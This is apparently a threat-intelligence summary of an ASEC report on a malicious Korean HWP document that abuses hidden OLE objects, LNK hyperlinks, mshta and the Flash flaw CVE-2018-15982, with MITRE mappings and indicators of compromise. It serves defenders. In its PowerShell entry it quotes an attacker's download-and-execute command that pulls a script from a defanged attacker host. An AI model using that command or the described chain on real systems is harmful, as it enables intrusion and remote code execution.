ASEC researchers identified a malicious HWP document that exploits OLE objects and a Flash vulnerability (CVE-2018-15982), using embedded links to trigger execution. The attack drops files in %TEMP%, hides OLE objects, and can download and run additional payloads via PowerShell and process hollowing, with the HWP file evolving to persist and reload embedded content. Hashtags: #CVE-2018-15982 #yukkimmo #sportsontheweb #Sjem #OLE #HWP #LNK #PowerShell #ProcessHollowing
Keypoints
- The HWP document is distributed with a misleading title and uses embedded hyperlinks to execute malicious actions when interacted with.
- OLE objects are hidden inside the document, and created files in %TEMP% include hword.exe (PowerShell), hwp.exe (mshta), hwp.lnk (malicious link), and 1234dd.tmp (additional HWP).
- The document appears as a “profile form” and contains blank spaces and embedded hyperlinks to trigger the created malicious files.
- Clicking the hyperlinks leads to a command that ultimately uses mshta to reach a remote URL and execute further payloads.
- The attacker downloads additional PE data from a remote server and uses process hollowing to run it, saving results and creating a new HWP-like file in the Recent folder.
- An additional HWP variant (1234dd.tmp) is loaded by copying and renaming, preserving the embedded flash object and similar behaviors.
- IOCs include specific file hashes, certain URLs and domains, and multiple embedded filenames associated with the dropper and loader.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – The HWP document is distributed with a misleading title (e.g., “profile form”) to entice opening. Quote: “Judging by the content of the document, it appears that this document was distributed with a title such as ‘profile form’, similar to past cases.”
- [T1023] Shortcut Modification – LNK-based execution via embedded link file that triggers payloads when clicked. Quote: “The link file that is run when the hyperlink is clicked contains the following command, so it ultimately accesses a malicious URL using mshta.”
- [T1218.005] Mshta – Use of mshta to execute a remote payload via a hyperlink. Quote: “thus accesses a malicious URL using mshta.”
- [T1203] Exploitation for Client Execution – Exploiting CVE-2018-15982 Flash vulnerability embedded in the HWP content. Quote: “This URL contains the flash vulnerability (CVE-2018-15982) file.”
- [T1059.001] PowerShell – The document uses PowerShell-based commands (e.g., hword.exe) to download and execute payloads. Quote: “hword.exe -nop -c ”iex(new-object net.webclient).downloadstring(‘hxxp://yukkimmo.sportsontheweb[.]net/h.txt’)”
- [T1055.012] Process Hollowing – The downloaded PE data is executed via process hollowing on System32cmd.exe. Quote: “This data is executed by using the process hollowing technique on System32cmd.exe.”
- [T1105] Ingress Tool Transfer – The attacker downloads additional data (e.g., 2247529.txt) from a remote server. Quote: “The code downloads additional PE data from hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt and saves it in the %temp% folder as ‘2247529.txt’.”
Indicators of Compromise
- [Hash] 76f8ccf8313af617df28e8e1f7f39f73 – hwp (example hash cited for HWP dropper)
- [Hash] 9a13173df687549cfce3b36d8a4e20d3 – lnk (example hash cited for link file)
- [Hash] 804d12b116bb40282fbf245db885c093 – hwp
- [Hash] caa923803152dd9e6b5bf7f6b816ae98 – script
- [Hash] 2f4ed70149da3825be16b6057bf7b8df – exe
- [Hash] 65993d1cb0d1d7ce218fb267ee36f7c1 – SWF
- [Hash] 330f2f1eb6dc3d753b756a27694ef89b – hwp
- [URL] hxxp://yukkimmo.sportsontheweb.net/hw.php – payload URL used by LNK/mshta chain
- [URL] hxxp://yukkimmo.sportsontheweb.net/h.txt – PowerShell script URL
- [URL] hxxp://yukkimmo.sportsontheweb.net/2247529.txt – PE data download
- [URL] hxxp://www.sjem.co.kr/admin/data/category/notice_en/view.php – Flash vulnerability host
Read more: https://asec.ahnlab.com/en/38479/